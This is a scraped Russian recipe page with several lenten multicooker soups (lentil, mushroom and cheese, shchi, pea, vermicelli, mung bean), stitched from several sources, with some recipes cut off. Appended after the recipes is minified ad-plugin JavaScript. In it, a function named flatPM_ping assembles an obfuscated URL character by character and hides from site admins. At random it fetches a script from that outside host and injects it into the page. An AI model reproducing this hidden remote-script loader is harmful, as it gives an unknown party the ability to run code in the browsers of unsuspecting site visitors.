Постный суп в мультиварке рецепт

Постные супы в мультиварке: рецепты и советы по приготовлению

Великий пост продолжается, а потому многие люди все чаще задумываются над тем, чтобы еще такого приготовить, чтобы оно было вкусным и, тем не менее, не нарушало основных ограничений в еде, действующих в это время в православном мире. Предлагаем вашему вниманию различные постные супы в мультиварке, рецепты которых настолько элементарны, что с ними справится даже начинающий кулинар.

Суп из чечевицы

Чечевица – очень полезный продукт, который часто входит в меню диет и постного питания. Она вкусна и необычайно богата на питательные вещества (в ее составе есть большое количество железа и витамина B1). Поэтому блюда на ее основе можно смело вводить в свой рацион, как и такой простой суп на ее основе.

Ингредиенты: 2 картофелины крупного размера, 1 мультиварочный стакан чечевицы (или 130 грамм), 1 морковка, половинка большой луковицы, 2 ст.л. растительного масла, 2 маленьких бульонных кубика, 2 лавровых листа, около 1 л воды.

Как готовить: 1. Овощи вымыть, очистить от кожицы. Картофель и морковь измельчить в виде кубиков, лук просто порезать на маленькие кусочки.

2. В мультиварку налить 35 грамм растительного масла, бросить в него лук и морковку, поджарить их в режиме «Выпечка» в течение 10-ти минут.

3. Бросить в зажарку бульонные кубики.

4. После этого добавить сюда же картофель и чечевицу. В последнюю очередь положить лавровый лист. Готовить все вместе 1 час, выбрав режим «Тушение».

Суп с шампиньонами и сыром

Шампиньоны в сочетании с сыром имеют очень приятный вкус, а поэтому их часто готовят вместе. А в большинстве случаев эти два продукта становятся основой для самых лучших первых блюд.

Ингредиенты: 200 грамм шампиньонов (они должны быть свежими), 5 средних картофелин, 2 длинных стебля лука-порея, половинка корня сельдерея, 1 средняя луковица, 1 свежая морковка, 2,5 литра воды (или овощного бульона), 300 грамм качественного плавленого сыра, 2 ст. л. измельченного зеленого лука, 2 ст. л. измельченной петрушки, 1 веточка свежего базилика, соль и перец.

Как готовить: 1. Грибы хорошенько промыть, нарезать в виде тонких ломтиков. Овощи также очистить от грязи и кожуры.

2. Лук-порей нарезать полукольцами, а сельдерей и картофель – кубиками. Морковь желательно натереть на среднюю или мелкую терку.

3. В мультиварке включить соответствующий режим для приготовления зажарки (это может быть «Мультиповар» или «Выпечка»). Налить в нее растительное масло, когда оно хорошо прогреется, бросить туда шампиньоны. Обжарить их до золотистой корочки, добавив к ним лук-порей, морковь, лук и корень сельдерея. Тушить овощи вместе с течение 5 минут.

4. Влить в зажарку воду (или бульон), подождать пока она закипит и только после этого бросить в нее сырой картофель. Проварить его 10-ть минут и добавить в суп тертый сыр, подготовленную зелень со специями. Все перемешать, проварить еще 5-ть минут. Затем выключить газ. Блюдо готово.

Кстати, когда пост окончится, вместо воды для супа можно использовать любой мясной бульон.

Постные щи

Щи являются одним из самых традиционных первых блюд, которые большинство хозяек готовят очень часто, ведь их состав может быть настолько разнообразным, что они никогда не «приедаются». Вот так и в случае с постом, при необходимости их можно готовить абсолютно без мяса.

Ингредиенты: 400 грамм картофеля, 250 грамм капусты, 1 небольшой болгарский перец, 1 средняя луковица, 1 морковка, 1 банка консервированной фасоли, 2 ст. ложки концентрированного томатного соуса, 1 литр воды, специи (лавровый лист, соль и прочее) – по вкусу.

Как готовить: 1. Каждый овощ промыть, очистить и нарезать любым удобным способом.

2. Все составляющие блюда сложить в мультиварку. Сверху овощи полить томатным соусом.

3. Сюда же добавить воду и специи.

4. Включить мультиварку, используя режим «Суп», задав время варки длительностью в 1 час.

5. По истечению указанного времени, щи можно разливать по тарелкам и наслаждаться вкусной постной едой.

Вот такими могут быть супы, приготовленные в мультиварке. Большим плюсом этого способа приготовления первых блюд есть то, что хозяйкам в данном случае больше никогда не придется переживать о том, что их суп «сбежит» на плиту. К тому же, он получится особенно вкусным, так как мультиварка готовит еду в полностью закрытой емкости (крышка всегда находится герметически закрытой), что защищает продукты от окисления, а потому они сохраняют большую часть своих полезных свойств, а их вкус кажется более насыщенным.

Смело экспериментируйте с возможностями своей кухонной техники, и она не раз вас приятно удивит!

Постный гороховый суп в мультиварке

Предлагаю приготовить вкусный гороховый суп в мультиварке! Получается очень вкусное и сытное блюдо, которое при этом не содержит мясо и прекрасно подойдет как для вегетарианской кухни, так и для питания во время постов. Ингредиенты для этого супа найдутся у любой хозяйки. Я готовлю в мультиварке Redmond M25.

Ингредиенты для «Постный гороховый суп в мультиварке»:

  • Лук репчатый — 2 шт
  • Морковь — 2 шт
  • Картофель — 3 шт
  • Горох — 200 г
  • Вода — 2 л
  • Масло растительное — 3 ст. л.
  • Соль — 1 ст. л.
  • Перец черный — 1 ч. л.
  • Лист лавровый — 2 шт

Время приготовления: 140 минут

Количество порций: 10

Параметры приготовления в мультиварке:

Мощность: 900 Ватт

Основная программа: Тушение (120 минут)

Дополнительная программа: Жарка (15 минут)

Рецепт «Постный гороховый суп в мультиварке»:

Обжарить овощи в мультиварке в растительном масле в режиме “Жарка” или “Выпечка” 10 минут.

Порезать картофель кубиками.

Добавить картофель к обжаренным овощам и все вместе обжарить еще 5 минут.

Добавить к овощам горох и перемешать.

Влить в чашу мультиварки 2 л воды, добавить соль и специи, перемешать.

Включить мультиварку в режиме “Тушение” на 2 часа. За это время горох прекрасно разварится и суп получится как из русской печки. Если любите более твердый горох в супе, то можно уменьшить время готовки минут на 40.

Подписывайтесь на группу Поварёнка в Контакте и получайте десять новых рецептов каждый день!

Вступайте в нашу группу в Одноклассниках и получайте новые рецепты каждый день!

Поделиться рецептом с друзьями:

Нравятся наши рецепты?
BB-код для вставки:
BB-код используется на форумах
HTML-код для вставки:
HTML код используется в блогах, например LiveJournal

Как это будет выглядеть?

Похожие рецепты

Суп “Харчо” в мультиварке

  • 119
  • 849
  • 78809

Борщ на даче у друзей

  • 171
  • 91
  • 4962

Суп с белыми грибами и курицей

  • 44
  • 193
  • 15255

Сырный суп с гречкой и шампиньонами

  • 22
  • 63
  • 3716

Щи с тыквой “Богатые”

  • 84
  • 136
  • 3921

Куриный крем-суп с грецкими орехами

  • 22
  • 166
  • 5867

Рассольник пикантный без мяса

  • 2
  • 9
  • 1026

Сливочный пшенный суп с грибами

  • 177
  • 770
  • 11451

Зеленый борщ “По-нашему”

  • 144
  • 216
  • 51058

Фотографии «Постный гороховый суп в мультиварке» от приготовивших (1)

Комментарии и отзывы

2 апреля 2019 года Maniga #

2 апреля 2019 года Lana Levina # (автор рецепта)

Обожаю разваристые супы; суп-пюре, а такие простые рецепты вдвойне приятны)

25 марта 2019 года Ася09 #

25 марта 2019 года Ася09 #

25 марта 2019 года Lana Levina # (автор рецепта)

25 марта 2019 года Ася09 #

25 марта 2019 года Галина0505 #

25 марта 2019 года Lana Levina # (автор рецепта)

25 марта 2019 года tehnolog kp #

25 марта 2019 года Lana Levina # (автор рецепта)

25 марта 2019 года tehnolog kp #

25 марта 2019 года Lana Levina # (автор рецепта)

25 марта 2019 года tehnolog kp #

25 марта 2019 года Lana Levina # (автор рецепта)

25 марта 2019 года Наталика72 #

25 марта 2019 года Lana Levina # (автор рецепта)

25 марта 2019 года Ася09 #

24 марта 2019 года galina27 1967 #

24 марта 2019 года Lana Levina # (автор рецепта)

18 марта 2019 года jouliken #

18 марта 2019 года Lana Levina # (автор рецепта)

20 марта 2019 года jouliken #

18 марта 2019 года мисс #

18 марта 2019 года Lana Levina # (автор рецепта)

17 марта 2019 года MalipusN #

18 марта 2019 года Lana Levina # (автор рецепта)

Оставить комментарий или отзыв о рецепте

Зарегистрироваться, или войти если вы уже регистрировались.

Вы можете войти на сайт без регистрации и ввода пароля, воспользовавшись своей учетной записью на следующих сайтах:

Постный суп с вермишелью в мультиварке

Готовить супы в мультиварке очень удобно, поскольку все делается в одной емкости. Но это не означает, что первое будет хуже, чем на плите. Достаточно правильно подобрать ингредиенты и вовремя выключить машину, чтобы получить невероятно вкусный суп в мультиварке без мяса с вермишелью.

Советы по выбору продуктов для супа

В постные супы очень важно добавить максимум подходящих ингредиентов, чтобы первое получилось насыщенным. Что же лучше использовать:

  1. Самые разные свежие овощи, чем больше, тем лучше: морковь, лук (репчатый, синий или порей), капусту (пекинскую, брокколи, цветную или брюссельскую), картошку, кабачки, чеснок и/или болгарский перец.
  2. Консервы: горошек, фасоль, кукурузу, покупные заправки для супов.
  3. Плавленый сыр и соусы: классический белый с мукой или томатный на основе пасты.
  4. Зелень: петрушку, укроп, тархун, базилик и/или петрушку.

Самые вкусные рецепты

Первый рецепт супа без мяса с вермишелью будет сделан для классической подачи, а значит потребует:

  • короткую вермишель «Паутинка» – 110 г;
  • кипяток – 1,5 л;
  • морковь и желтый лук – по 85-90 г;
  • веточки петрушки – 4-5 шт.;
  • кусочек сливочного масла;
  • картофель – 3 шт.;
  • соль и приправы для супа по вкусу.

В чашу мультиварки положить кусочек сливочного масла. Установить режим «Жарка». Как только оно станет жидким, добавить измельченный лук и морковь. Через 3-4 минуты обжаривания влить внутрь запланированный объем горячей воды. Переустановить режим на «Суп» или «Варка».

Теперь вбросить мелкие кубики тщательно вымытого от крахмала картофеля. Томить около 5-6 минут под плотно закрытой крышкой. Затем переместить в суп тонкую вермишель. Посолить. Дополнить приправами. Спустя 7-8 минут заправить листиками петрушки, выключив машину из сети.

Еще один отличный вариант постного первого – суп пюре. Добавить лучше те овощи, которые дадут более правильную однородную консистенцию. Подробнее такое блюдо будет рассмотрено на примере супа с вермишелью с добавлением подходящих овощей, для чего нужны:

  • морковь – 95-100 г;
  • кабачки – 100-105 г;
  • картошка – 245-250 г;
  • кипяченая вода – 1 л;
  • макароны «Спиральки» – 80-85 г;
  • сметана – 2 ст. л.;
  • специи для супа.

Очищенные овощи хорошо промыть, после чего нарезать мелким кубиком. Пересыпать в чашу, долить кипяток и отварить до мягкости. Потом слить в стакан немного отвара. Оставшиеся ингредиенты измельчить блендером, при необходимости подливая бульон. Окончательная консистенция – однородная, похожая на кефир.

Параллельно сварить в кастрюле с соленой водой спиральки. Макароны будут готовы спустя 5-6 минут. Слить горячий отвар, переместить в чашу и добавить специи, включая каменную соль. Заправить жирной сметаной. Перемешивая, томить до закипания, а потом выключить мультиварку и разлить первое по тарелкам.

Также заслуживает внимания ароматный грибной суп с вермишелью, который нужно будет загустить плавленым сыром. Для такого первого, достойного ресторанной подачи, необходимо подготовить:

  • литр воды;
  • два плавленых сырка;
  • шампиньоны – 250 г;
  • макароны «Мелкая ракушка» – 110 г;
  • поваренная соль;
  • черный перец по вкусу;
  • картошка – 250 г;
  • зелень и сухарики для подачи.

В литре кипятка отварить в режиме «Суп» до готовности картофельные кубики, свежие обработанные шампиньоны и мелкие ракушки. Через 15 минут клубни и грибы достать и перекинуть в чашу блендера. Измельчить, подливая немного процеженного бульона. Макароны на время отставить в миске в сторону.

В емкость машины вернуть довольно жидкое пюре, заправив перцем и солью. Добавить порезанные плавленые сырки. Растворить при постоянном смешивании, не накрывая крышку. Выключив мультиварку, вмешать партиями отварные ракушки. Настоять, защелкнув крышку приблизительно полчаса. Уже в тарелках дополнить сырный суп с вермишелью сухариками и зеленью.

Отварные шампиньоны можно не перебивать вместе с картошкой, а порубить тонкими слайсами, которые обжарить в сливочном масле и добавить уже с отварными ракушками в самом конце.

Следующий рецепт – томатный суп с макаронами. Такие первые популярны в итальянской и средиземноморской кухне. Для этого блюда нужно взять:

  • сочные помидоры – 5 шт.;
  • фарфалле – 95 г;
  • вода – 1 л;
  • чеснок и базилик – для заправки;
  • красный сладкий перец – 125 г;
  • ложка оливкового масла;
  • морковь – 70 г;
  • соль и любой перец.

Помидоры вымыть и бланшировать. Мелко порезать. Красный перец и морковь порубить небольшими кубиками. Прокалить на дне чаши (режим «Жарка») ложку оливкового масла. Вкинуть перечисленные овощи. Прожарить до мягкости на протяжении 10 минут.

За это время измельчить чеснок без шелухи и просушенный чистый базилик. Добавить в прожарку, перемешать и заправить специями. Затем влить кипяток и ввести фарфалле. Томить уже в режиме «Суп» или «Варка» томатный суп с вермишелью до ее готовности, что займет не более 15 минут.

Последний суп предлагается сделать с добавлением морепродуктов. Это довольно дорогой вариант, но иногда можно себе позволить такое изысканное первое, для которого понадобятся:

  • мидии и креветки – по 100 г;
  • кипяченная вода – 3 стакана;
  • длинная тонкая вермишель – 55 г;
  • репчатый лук – 50-55 г;
  • треть лимона;
  • соль/перец;
  • сливочное масло для лука;
  • петрушка для заправки.

Морепродукты тщательно зачистить: мидии от песка, а креветки от кишки на спинке. Все промыть, стряхнув жидкость. Перекинуть в миску, у выдавить треть лимона. Заправить каменной солью и ароматным перцем. Аккуратно перемешать, оставив мариноваться на полчаса.

За это время почистить и измельчить репчатый лук. Прожарить до легкого золотого оттенка в горячем сливочном масле. Как только все будет готово, в чашу влить воду, которую необходимо довести до кипения. Затем осторожно вложить длинную тонкую вермишель.

Довести до вкуса, подсолив. Спустя 5 минут заложить, избегая брызг, которые могут обжечь руки, промаринованные морепродукты. Томить еще 2-4 минуты, а затем высыпать зелень, смешать и подать со свежим хрустящим хлебом.

Постный суп в мультиварке рецепт

Тем, кто постится, необходимо поддерживать свой организм, включая в рацион блюда из бобовых культур. Именно вот такой суп пополнит запас жизненных сил и даст вам дополнительную энергию. Будет вкусно! Описание приготовления: Постные блюда должны быть вкусными и полезными. Во время поста, особенно длительного, человеческий организм нуждается в пополнении потраченной энергии. Я предлагаю вам простой рецепт, как приготовить постный суп в мультиварке. Изюминкой этого супа будет маш – бобовая культура, которая очень полезна. А еще в супе есть обжаренные овощи, которые придадут супу насыщенный вкус. Если в вашей семье любят бобовые, обязательно приготовьте такой суп. Приятного аппетита! Количество порций: 6

Ингредиенты

Перец черный молотый – 1-2 Щепоток

Морковь – 1 Штука

Кабачок – 1 Штука (молодой тонкий..примерно 200-300 г.)

Лук репчатый – 1 Штука

Соль – 1-1,5 Чайных ложки (по вкусу)

Картофель – 2-3 Штук

Смесь прованских трав сухих – 1 Щепотка

Масло растительное – 3 Ст. ложки

Пошаговый рецепт

Чистим овощи, моем их. Нарезаем все овощи кубиками.

В чашу мультиварки наливаем растительное масло, включаем режим “Жарка” и выставляем время 25 минут. Когда чаша нагреется, выкладываем в нее овощи и обжариваем, помешивая, до окончания времени готовки.

Вынимаем обжаренные овощи из мультиварки.

Многие советуют замачивать маш перед варкой, я этого не делаю – он и так варится быстро. Перед варкой маш тщательно промываем.

Заливаем в чашу воду, включаем режим “Варить” и выставляем время 1 час. Выкладываем в мультиварку промытый маш. Варим 40 минут, затем добавляем обжаренные овощи и солим, добавляем перец и травы. Варим до окончания указанного времени.

Похожие рецепты

Постный гороховый суп в мультиварке

Репчатый лук – 1 Штука

Черный молотый перец – 1 Щепотка (по вкусу)

Морковь – 1 Штука

Соль – 1 Чайная ложка (по вкусу)

Сухой колотый горох – 200 Грамм

Лавровый лист – 1 Штука

Картофель – 4-5 Штук

Для начала нам необходимо очень хорошо промыть под проточной водой горох.

Засыпаем промытый горох в чашу мультиварки, заливаем его водой – литра 2. Закрываем крышку мультиварки, и ставим режим варки на минут 30.

В это время чистим и нарезаем картофель. Нарезать можно любым способом: кубиками, брусочками, как вам больше нравится.

Очищенную морковь натрем на сред.

Постный суп с чечевицей в мультиварке

Масло соевое – 1,5 ст. л.

Чечевица – 120 г

Картофель – 250 г

Перец болгарский – 10 г

Лук репчатый – 100 г

Вот такие продукты нам понадобятся. Немного о чечевице. Я покупаю ее на развес, на рынке. Выходит дешевле. Можно выбрать сорт, посмотреть, как она выглядит. Ранее покупала в пакетах в супермаркете, выходило очень дорого и не факт, что там не обнаруживался мусор.

Чечевицу перебираем (при необходимости), промываем и заливаем на полчаса прохладной водой.

Постный грибной суп в мультиварке

Грибы – 250-300 Грамм

Морковь – 1-2 Штук

Луковица – 1-2 Штук

Растительное масло – 2 Ст. ложки

Картофель – 2-4 Штук

Специи – По вкусу (перец, лавровый лист, чеснок и т.д.)

Чечевица – 150 Грамм (по желанию)

1. Начните процесс с того, что налейте в чашу растительное масло и включите режим “Жарка”. Пока масло разогревается, очистите луковицу, нарежьте её мелкими кубиками, а морковь натрите на мелкой или средней терке. Выложите овощи в чашу и обжарьте, помешивая, до мягкости.

2. Выложите в чашу грибы (в данном случае в рецепте приготовления постного грибного супа в.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};